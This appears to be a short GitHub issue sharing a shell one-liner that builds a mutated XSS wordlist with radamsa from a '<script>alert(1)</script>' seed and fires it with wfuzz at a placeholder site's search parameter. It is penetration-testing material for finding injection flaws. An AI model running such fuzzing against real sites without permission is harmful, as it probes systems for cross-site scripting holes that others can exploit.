Generation wordlist for xss and fuzzing
Tr1ad0s opened this issue · 0 comments
Tr1ad0s commented
IFS=$'\n'; for((i=1; i<100; i++)); do echo '<script>alert(1)</script>' | radamsa 1>> lol1.txt; done && wfuzz -c -t 50 -w lol1.txt -u https://site/search/?q=FUZZ